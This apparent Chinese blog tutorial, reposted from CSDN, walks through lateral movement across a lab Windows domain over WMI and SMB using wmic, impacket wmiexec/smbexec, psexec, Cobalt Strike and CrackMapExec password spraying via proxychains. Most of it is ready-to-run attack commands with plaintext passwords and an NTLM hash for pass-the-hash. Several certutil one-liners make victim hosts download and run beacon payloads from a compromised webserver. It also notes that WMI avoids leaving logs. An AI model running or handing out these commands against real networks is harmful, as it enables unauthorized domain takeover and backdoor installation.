免费申请一个不花钱网站,企业级建站,wordpress博客类型文章),做网站宿迁目录
网络拓扑图
网络环境说明
WMI协议
SMB协议
域内信息收集
WMI协议 - 横向移动
利用方式一#xff1a;wmic命令
利用方式一#xff1a;cscript
利用方式一#xff1a;impacket
SMB协议 - 横向移动
利用方式一#xff1a;psexec
利用方式二#xff1a;psexe…目录
网络拓扑图
网络环境说明
WMI协议
SMB协议
域内信息收集
WMI协议 - 横向移动
利用方式一wmic命令
利用方式一cscript
利用方式一impacket
SMB协议 - 横向移动
利用方式一psexec
利用方式二psexec.exe
利用方式三CS插件
利用方式四Impacket-smbexec
利用方式五services
域横向移动-工具自动化横向
CraMapExec-密码喷射
一. 下载安装Linux平台代理Proxychains
二. CraMapExec 上线整个内网 网络拓扑图
IPC横向移动的实验环境如下 网络环境说明
攻击机 LInux IP47.94.236.117
内网环境单域环境 Webserver内网主机的网络出口已拿到权限通过它进行内网横向移动 IP192.168.46.146 192.168.3.31 DC域控 IP192.168.3.21 Jack-PC IP192.168.3.29 Mary-PC IP192.168.3.25 SQLServerIP192.168.3.32 FileServer IP192.168.3.30
目标拿下整个内网 WMI协议
WMIWindows Management Instrumentation协议是一种用于管理和监控Windows操作系统的协议。它是Microsoft Windows提供的一套系统管理和监控工具用于管理本地或远程计算机上的系统信息、配置和状态。
WMI协议的主要目标是提供一种统一的接口使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。
通过使用WMI协议可以执行以下操作 获取系统信息可以查询计算机的硬件信息如CPU、内存、磁盘、操作系统信息如版本、安装日期、网络信息等。 远程管理可以通过WMI协议远程管理其他计算机上的服务、进程、事件日志等。 监控和警报可以通过WMI协议实时监控系统的性能指标、事件日志并设置警报和触发操作。 配置和设置可以使用WMI协议修改系统配置、管理用户账户、安装软件等。
在Windows操作系统中WMI协议提供了强大的管理和监控功能使系统管理员能够更轻松地管理和维护系统。开发人员也可以利用WMI协议编写 SMB协议
SMBServer Message Block协议是一种用于在计算机网络上共享文件、打印机和其他资源的通信协议。它是在局域网LAN中广泛使用的一种协议最初由IBM开发后来由微软引入并逐渐发展为现代的SMB协议。
SMB协议的作用是允许计算机之间共享文件和资源并提供对这些共享资源的访问和管理。它提供了一套通信规范和命令使计算机能够进行以下操作 文件共享SMB协议允许计算机共享文件和文件夹。通过SMB协议用户可以在网络上访问其他计算机上共享的文件就像访问本地文件一样。这使得多个用户可以在网络上共享和协作编辑文件。 打印机共享SMB协议还支持打印机共享。它允许计算机将本地打印机共享给其他网络上的计算机使这些计算机可以通过网络打印文件。 资源访问和管理SMB协议提供了一系列命令和功能用于访问和管理网络上的共享资源。用户可以通过SMB协议浏览共享资源、查看文件属性、创建、删除和重命名文件等。 身份验证和安全SMB协议支持身份验证机制确保只有经过授权的用户可以访问共享资源。它使用用户凭据进行身份验证并可以使用加密来保护数据传输的安全性。
SMB协议通常在应用层和传输层之间运行使用TCP/IP作为底层的网络传输协议。它在Windows操作系统中得到广泛应用并被用于局域网中的文件共享和打印机共享。此外SMB协议还经过不断的发展和改进最新的版本是SMB3它引入了更高的性能和安全性特性。 域内信息收集
主要针对内网的网络情况已沦陷主机明文密码Hash抓取上进行收集
如何收集不再赘述直接展示收集的结果
域中网络Webserver 192.168.46.128 192.168.46.*网段出网192.168.3.*网段不出网
针对的135端口扫描 已沦陷主机内存密码Hash抓取结果 WMI协议 - 横向移动
WMI协议是通过135端口进行利用的支持用户明文或hash方式进行认证
不会再目标系统日志留下痕迹 利用方式一wmic命令
这是一个单执行的指令系统自带命令无回显
优势不需要免杀
缺点不支持Hash且无回显 win10 使用该命令会报错 ‘vmic’ 不是内部或外部命令也不是可运行的程序 或批处理文件。 在Win10中wmic已经归入C:\Windows\System32\wbem文件夹而环境变量只设置到C:\Windows\System32因此找不到wmic 只需要添加C:\Windows\System32\wbem 到环境变量——系统变量的Path变量 执行命令 换用DC账户密码ver已经执行了但是因为无回显 执行命令说明执行了但是无回显
普通账号显示拒绝访问 权限不够DC账号可用
wmic /node:192.168.3.32 /user:administrator /password:admin!#45 process call create cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/bindtcp-2222.exe c:/beacon.exe 执行命令。经测试 不能执行后门DC账号也不能用
wmic /node:192.168.3.32 /user:administrator /password:admin!#45 process call create cmd.exe c:/beacon.exe 利用方式一cscript
这是交互式的也就意味可以反弹shell但是CS无法反弹直接会卡死
这个实战不常用
需要再Webserver上传wmiexec.vbs
在Webserver上执行命令cscript系统自带
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345反弹shell 无法反弹shell适合在shell环境进行横向移动 利用方式一impacket
利用impacket中的wmiexec模块进行横向移动非系统自带支持hash传递
想要使用这种方式
上传工具到webserver上需要py解析环境通过代理技术把攻击机带进内网中就可以攻击机本地测试推荐
代理搭建
CS服务端代理转发-Socks代理-配置代理端口
攻击机proxifier设置代理IP为CS服务器IP47.94.236.117
Py本地运行测试目标的本地用户 administrator
python3 wmiexec.py ./administrator:admin!#45192.168.3.32 whoami
或者
python3 wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator192.168.3.32 whoami CS建立反向连接
CS选择Webserver的会话建立监听器生成木马上传到Webserver的web服务根目录下
之后横向移动令目标下载木马并执行 目标C盘出现木马 上线 接下来就再抓取新沦陷主机的内存明文密码和Hash SMB协议 - 横向移动
利用SMB服务可以通过明文或hash传递来远程执行条件445服务端口开放。 利用方式一psexec
交互式 windows官方工具白名单不会被杀可以从微软官方pstools下载得到
在上面已经建立了代理的情况攻击机访问192.168.3.*网络的流量都会转发给CS服务器发到内网中可以在本地直接测试
这个是交互式的会反弹一个cmd窗口所以不可以在CS上做。
这个的执行需要管理员以上的权限
攻击机本地测试
psexec64 \\192.168.3.32 -u administrator -p admin!#45 -s cmd反弹shell回来 利用方式二psexec.exe
EXE版Impacket的利用同上在本地进行测试
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator192.168.3.32也会反弹会一个shell 利用方式三CS插件
CS差价-有手就行 失败 去掉域GOD 成功上线 选上GOD就是用域用户administrator登录不选就是本地adminstrator登录两个是不一样的
原因很简单用GOD域用户administrator登录账号密码是错误的那个Hash不是域用户的这个Hash确实本地administrator的。
横向移动要学会切换用户去攻击攻击对方域用户攻击对方本地账户 利用方式四Impacket-smbexec
利用代理技术把攻击机带入内网进行攻击
攻击本地用户 明文密码成功
python3 smbexec.py ./administrator:admin!#45192.168.3.32 #非域用户 攻击域用户 明文密码失败
python3 smbexec.py god/administrator:admin!#45192.168.3.32 #域用户 攻击本地用户 Hash成功
python3 smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator192.168.3.32 攻击域用户 Hash失败
python3 smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c god/administrator192.168.3.32smbexec -hashes god/administrator:518b98ad4178a53695dc997aa02d455c192.168.3.32 利用方式五services
单执行无回显不推荐太麻烦了
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:192.168.3.32 start -name shell域横向移动-工具自动化横向
这上一篇中演示了IPC协议使用写脚本横向移动
每次跑完脚本有主机上线抓取密码使用新密码再进行横向移动跑脚本。
如果有的主机被发现每次修改密码太过于繁琐。推荐一款工具实现自动化 CrackMapExec Githubhttps://github.com/Porchetta-Industries/CrackMapExec 官方手册https://mpgn.gitbook.io/crackmapexec/ 部分案例https://www.freebuf.com/sectool/184573.html 下载对应release建立socks连接设置socks代理配置规则调用 Linux Proxychains使用 安装使用https://blog.csdn.net/qq_53086690/article/details/121779832 代理配置Proxychains.conf 代理调用Proxychains 命令 ———————————————— 版权声明本文为CSDN博主「今天是 几 号」的原创文章遵循CC 4.0 BY-SA版权协议转载请附上原文出处链接及本声明。 原文链接https://blog.csdn.net/weixin_53009585/article/details/129775792 CraMapExec-密码喷射
常用命令 密码喷射域登录 proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ 密码喷射本地登录 proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ --local-auth 密码喷射本地登录命令执行 proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ -x ‘whoami’ --local-auth 密码喷射本地登录命令执行上线 proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/webserver4444.exe c:/webserver4444.exe’ --local-auth 密码喷射域登录命令执行上线 proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe c:/webserver4444.exe’ 密码喷射本地域登录命令执行全自动上线 proxychains python cme smb 192.168.3.21-32 -u user.txt -p pass.txt -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe c:/webserver4444.exe’ proxychains python cme smb 192.168.3.21-32 -u administrator -p pass.txt -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe c:/webserver4444.exe’ --local-auth Windows平台使用使用代理运行工具即可
这里演示的是Linux平台项目放在Linux上跑
Linux--Proxychains(代理Linux流量转发)---CS 和win平台原理一样就是换个工具
现在回到最开始只拿到一个主机的时候提取的密码 一. 下载安装Linux平台代理Proxychains
安装使用参考这篇文章很详细
https://blog.csdn.net/qq_53086690/article/details/121779832
代理配置文件Proxychains.conf
代理调用Proxychains 命令
配置代理
vim /etc/Proxychains.conf 走的是SOCK4协议因为攻击机就是CS所在的服务器所以需要把代理配置再本地的30194端口CS接收发送到内网 二. CraMapExec 上线整个内网
测试代理
使用代理运行工具打开项目
proxychains python cme 使用smb协议通讯内网主机 192.168.3.21
proxychains python cme smb 192.168.3.21 密码喷射与登录测试域登录即攻击域用户
proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ 全部失败红色减号表示失败 密码喷射本地登录 攻击主机本地用户
proxychains python cme smb 192.168.3.21-32 -u administrator -p ‘admin!#45’ --local-auth
成功测试出来可以登录的主机 直接攻击 192.168.3.29 命令执行 之后命令该为下载执行命令即可 192.168.3.29 上线CS 测试利用Hash喷射域用户 全部成功
因为这个Hash正好是域控的Hash 加上命令执行 之后全部上线
还可以这样操作
vim u.txt 里面全是用户名信息收集得到
vim p.txt 拿到的所有凭据 u.txt和p.txt我写反了 不过没关系参数换一下即可 最终全部上线
也就是说我们控制lwebserver后提取密码与哈希就能利用这个工具自动化横向移动。
